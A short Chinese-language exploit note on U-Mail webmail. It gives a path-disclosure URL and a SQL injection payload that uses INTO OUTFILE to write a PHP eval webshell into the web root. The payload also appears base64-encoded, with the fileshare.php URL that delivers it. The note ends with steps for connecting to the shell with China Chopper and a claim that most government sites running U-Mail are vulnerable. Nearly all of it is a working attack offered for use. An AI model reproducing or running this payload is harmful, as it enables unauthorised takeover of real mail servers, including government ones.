加入
<code>webmail/userapply.php?execadd=333&DomainID=111</code>
直接爆出物理地址
然后将
<code>aa' union select 1,2,3,4,5,6,'<?php eval($_POST1);?>',8,9,10,11,12,13,14 into outfile 'D:/umail/WorldClient/html/saknc.php'#</code>
用base64编译一下
<code>YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1QxKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAnRDovdW1haWwvV29ybGRDbGllbnQvaHRtbC9zYWtuYy5waHAnIw==</code>
然后
<code>网站.com/webmail/fileshare.php?file=加上上面编译的base64代码</code>
可直接写入shell saknc.php
用菜刀连接
<code>网站.com/webmail/saknc.php</code>
密码:shell
并且大部分政府网站的u-mail都存在这个漏洞